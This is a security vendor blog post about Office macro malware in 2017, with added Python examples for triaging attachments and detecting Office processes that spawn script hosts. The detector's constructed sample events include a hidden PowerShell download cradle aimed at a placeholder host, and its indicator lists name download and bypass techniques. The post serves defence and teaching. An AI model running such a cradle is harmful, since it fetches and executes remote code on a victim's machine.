Hiding malicious macros inside Microsoft Office docs has once again become one of the most popular ways for criminals to launch their attacks. Here's everything you need to know about macro malware in 2017.
Unless you’re a newbie to the IT security business, you probably remember when Microsoft Office macros became one of the most popular means of malware delivery in the late 1990s and early 2000s. When Microsoft and others finally locked down their macro mechanisms, the incidence of macro-based malware declined sharply and authors moved on to other methods of infiltration.
But now macro malware has made a comeback, with criminals using it to prey on end-users to get past conventional signature-based AV solutions. It’s also no longer just a Windows problem — macro malware has made the move to Mac, too.
In this post, we’ll take a look at exactly what macro malware is, how it operates, and how you can keep it from rearing its head inside your organization. But first...
Macros are small programs embedded inside a document or application that automate repetitive tasks. In Microsoft Office they are written in Visual Basic for Applications (VBA) and are stored inside the document file itself, so they travel with it wherever it is emailed or copied.
For example, an accountant might embed a macro into Excel that pulls data from an external database. Or, a Word macro could be used to automate common processes, like adding a digital letterhead to documents or populating reports with a pre-formatted table. They’re also used often in payroll and business intelligence applications.
Macros are simple and easy to create, requiring no programming experience: creators basically "record" a procedure, then play the macro back each time they want to repeat it. What the recorder produces, though, is ordinary VBA source, which can be edited by hand and has the same reach as any other program running as the user: it can read and write files, open network connections, and drive other applications. The simplicity, efficiency, and time savings macros afford make them quite popular, especially in Office programs like Word and Excel, and that same reach is what makes macro malware so effective...the classic double-edged sword.
When Microsoft introduced macro capabilities into its Office suite, the embedded scripts ran automatically by default. That meant when one individual emailed a macro-embedded Word or Excel document to another, the macro executed the moment the recipient opened the document. Malware authors soon exploited this, writing macros that copied themselves into other documents or dropped and launched an executable, and emailing the documents to unwitting targets.
Microsoft and others eventually disabled the automatic execution, instead requiring users to manually enable macros on any incoming document. Between that and users becoming wise to the risk of opening suspicious documents or those from uncertain sources, macro malware took a nosedive.
Over the last few years, however, we've seen a resurgence of attackers using macros as first-stage downloaders that install their final payloads (typically ransomware or trojans). The macro itself is usually small: a routine bound to one of the auto-run events (AutoOpen or Document_Open in Word, Auto_Open or Workbook_Open in Excel) that fetches the real payload from a remote server, writes it to disk, and runs it, often by launching cmd.exe or PowerShell rather than doing the work in VBA. Here are a few of the most common threats today:
Macro malware is a favorite of hackers for several reasons:
Attackers capitalize on the fact that using and sharing Office documents is baked into most users' day-to-day work. They don't have to trick users into downloading suspicious executable files that many AV programs would block anyway. Instead, they deliver familiar-looking documents, like reports, invoices, and spreadsheets, via phishing emails. All they have to do is make the email itself look convincing enough to get the user to open the document.
Microsoft does disable macros by default, but the document still opens, with a yellow security-warning bar and an "Enable Content" button. Users can re-enable macros with a single click, and attackers build their decoy documents around that click, with a page of deliberately unreadable content and instructions to "enable editing and enable content" to view it. In a busy work environment it's easy to become blind or indifferent to warnings and alerts. Unfortunately, that one click gives macro malware the user's access to their machine, and potentially to the entire company's network, data, and infrastructure.
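Because the lure is a document rather than an executable, the first useful check at a mail gateway or in an incident-response triage script is simply "does this attachment carry a VBA project at all?", judged by the file's contents rather than its extension. The following is an added example, not code from the original post or from Barkly: the file names and the minimal in-memory documents built by `build_ooxml()` are constructed for illustration. Modern Office files (.docx, .docm, .xlsm, .pptm and friends) are ZIP containers in which a VBA project is stored as the part `vbaProject.bin`; legacy .doc/.xls files are OLE2 compound files and need a real OLE/VBA parser (oletools' `olevba`, for example), so here they are only flagged for deeper inspection.

```python
"""Triage an Office attachment by its container contents, not its extension.

Added example, not code from the original post or from Barkly. The file
names and the tiny in-memory documents built by build_ooxml() are
constructed for illustration.
"""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls/.ppt (compound file)
ZIP_MAGIC = b"PK\x03\x04"                          # Office Open XML containers
MACRO_FREE_EXTENSIONS = {"docx", "dotx", "xlsx", "xltx", "pptx", "potx"}
LEGACY_EXTENSIONS = {"doc", "dot", "xls", "xlt", "ppt", "pot"}


def inspect_office_file(name: str, data: bytes) -> dict:
    """Return a verdict for one attachment: format, whether it carries VBA, and any flags."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    verdict = {"name": name, "format": "unknown", "has_vba": False,
               "macro_enabled_ct": False, "ext_mismatch": False, "flags": []}

    if data.startswith(OLE2_MAGIC):
        verdict["format"] = "ole2"
        verdict["flags"].append("legacy binary Office file; parse with an OLE/VBA tool")
        return verdict
    if not data.startswith(ZIP_MAGIC):
        return verdict
    verdict["format"] = "ooxml"

    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                verdict["has_vba"] = True
                verdict["flags"].append("contains vbaProject.bin")
            if "[Content_Types].xml" in names:
                ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
                verdict["macro_enabled_ct"] = "macroEnabled" in ct
    except zipfile.BadZipFile:
        verdict["flags"].append("ZIP signature but unreadable archive")
        return verdict

    # Office picks the handler from the content, so a .doc extension on a ZIP
    # container that carries VBA is a classic way past extension-based filters,
    # and a macro-free extension (.docx) should never come with a VBA project.
    if verdict["has_vba"] and ext in MACRO_FREE_EXTENSIONS | LEGACY_EXTENSIONS:
        verdict["ext_mismatch"] = True
        verdict["flags"].append(f"extension .{ext} does not match macro-carrying content")
    return verdict


def build_ooxml(with_vba: bool) -> bytes:
    """Build a minimal, constructed Word container (not a real document) for testing."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba
               else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
        + ('<Override PartName="/word/vbaProject.bin" '
           'ContentType="application/vnd.ms-office.vbaProject"/>' if with_vba else "")
        + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            # Stand-in bytes only; a real vbaProject.bin is an OLE2 file with compressed VBA streams.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for fname, blob in (("invoice.docm", build_ooxml(True)),
                        ("invoice.doc", build_ooxml(True)),
                        ("report.docx", build_ooxml(False))):
        print(inspect_office_file(fname, blob))
```

The point of the `ext_mismatch` flag is that an attachment filter keyed on extensions is easy to dodge: Office opens a renamed macro-enabled container just fine, so a policy that blocks `.docm` but allows `.doc` is not really blocking macros. Inspect the container, and treat any VBA project in inbound mail as something that needs a reason to exist.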
Here are a few options for protecting your organization from macro malware, listed from most to least demanding:
While it might be a natural conclusion to jump to, simply disabling macros entirely, company-wide, isn't always a practical option. Some software and business processes rely on macros for functionality (business-intelligence tools and finance and accounting workflows, for example).
What about only allowing authorized macros? Maybe. Office's Trust Center has a "Disable all macros except digitally signed macros" setting, and it can be enforced centrally through Group Policy, with your internal code-signing certificate added to each machine's Trusted Publishers. The catch is the upkeep: every legitimate macro has to be signed, re-signed when it changes, and the trusted-publisher list kept current, which gets difficult to maintain from an IT perspective as an organization grows.
Microsoft has ramped up macro protection in Office 2016 and 2013, most notably with a Group Policy setting that blocks macros outright in documents that arrived from the Internet (based on the file's mark-of-the-web), so users never get an "Enable Content" button for an emailed attachment. But as with many other forms of malware, employee education is critical. Train users to spot phishing emails and emphasize the importance of keeping macros disabled, enabling them only if they're absolutely certain the document and the sender are legitimate.
As the last, most reliable line of protection against malicious macros, use runtime malware defense that can spot the tell-tale signs of macro-based attacks in system activity (an Office process launching cmd.exe, PowerShell or a script host; that child process immediately reaching out to the Internet and writing an executable to disk) and block them automatically before any damage is done.
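What "tell-tale signs in system activity" looks like in practice is a process-tree rule, and the detail that matters is ancestry: the macro typically launches cmd.exe, which launches PowerShell, so a rule that only looks at the immediate parent of PowerShell sees cmd.exe and misses the Office process two levels up. The following is an added example, not Barkly's product logic and not code from the original post. The events are constructed to resemble Sysmon Event ID 1 (process creation) records; the field names follow Sysmon, the values, paths and the `example.invalid` host are invented.

```python
"""Flag script interpreters launched from under an Office process.

Added example, not Barkly's product logic and not code from the original
post. SAMPLE_EVENTS are constructed to resemble Sysmon process-creation
records; all values are invented.
"""
import re

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
INDICATORS = {
    "download cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "url in command line": r"https?://",
    "certutil urlcache": r"\burlcache\b",
    "encoded command": r"-enc(odedcommand)?\b",
    "hidden window": r"-w(indowstyle)?\s+hidden",
    "execution policy bypass": r"-ep\s+bypass|executionpolicy\s+bypass",
}
INDICATOR_RE = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(ev, by_pid, max_depth=4):
    """Walk up the parent chain; return (image, depth) of the nearest Office process, or None.

    Checking only ParentImage would miss winword -> cmd -> powershell, where the
    Office process is the grandparent of the interesting child."""
    pid = ev.get("ParentProcessId")
    image = basename(ev.get("ParentImage", ""))
    for depth in range(1, max_depth + 1):
        if image in OFFICE_PROCESSES:
            return image, depth
        parent = by_pid.get(pid)
        if parent is None:
            return None
        pid = parent.get("ParentProcessId")
        image = basename(parent.get("ParentImage", ""))
    return None


def score_event(ev, by_pid):
    """Return the reasons this process-creation event looks like a macro payload stage ([] if none)."""
    ancestor = office_ancestor(ev, by_pid)
    if ancestor is None:
        return []
    child = basename(ev.get("Image", ""))
    reasons = []
    if child in SCRIPT_HOSTS:
        reasons.append(f"{ancestor[0]} is {ancestor[1]} level(s) above {child}")
    hits = [name for name, rx in INDICATOR_RE.items() if rx.search(ev.get("CommandLine", ""))]
    if hits:
        reasons.append("command line shows: " + ", ".join(hits))
    return reasons


def detect(events):
    """Run score_event over a batch of events; the pid map gives office_ancestor its chain."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    return [{"EventId": ev["EventId"], "Image": basename(ev["Image"]), "reasons": r}
            for ev in events if (r := score_event(ev, by_pid))]


# Constructed sample: a user opens a .docm whose macro runs cmd -> powershell
# download cradle; the print helper and an admin's own PowerShell are benign.
WINWORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
CRADLE = 'powershell -w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/s\')"'
SAMPLE_EVENTS = [
    {"EventId": 1, "ProcessId": 2000, "ParentProcessId": 1000, "Image": WINWORD,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\Invoice_4471.docm"'},
    {"EventId": 2, "ProcessId": 2100, "ParentProcessId": 2000, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": WINWORD, "CommandLine": "cmd.exe /c " + CRADLE},
    {"EventId": 3, "ProcessId": 2200, "ParentProcessId": 2100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": CRADLE},
    {"EventId": 4, "ProcessId": 2300, "ParentProcessId": 2000, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": WINWORD, "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"EventId": 5, "ProcessId": 3000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Temp"'},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Events 2 and 3 are flagged (cmd.exe one level under Word, PowerShell two levels under it, both with a download cradle and a hidden window on the command line); event 4 is not, because Word spawning its print helper is normal, and event 5 is not, because an administrator's PowerShell under Explorer has no Office ancestor. That ancestry check, plus blocking rather than merely logging the child process, is the behavior the page is describing when it talks about catching the attack before the payload lands.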
Rather than just scanning files and attempting to guess which ones are malicious, Barkly's runtime malware defense monitors for this kind of suspicious activity, so even if macro malware does get past traditional AV, it won't have a chance to unleash its payload.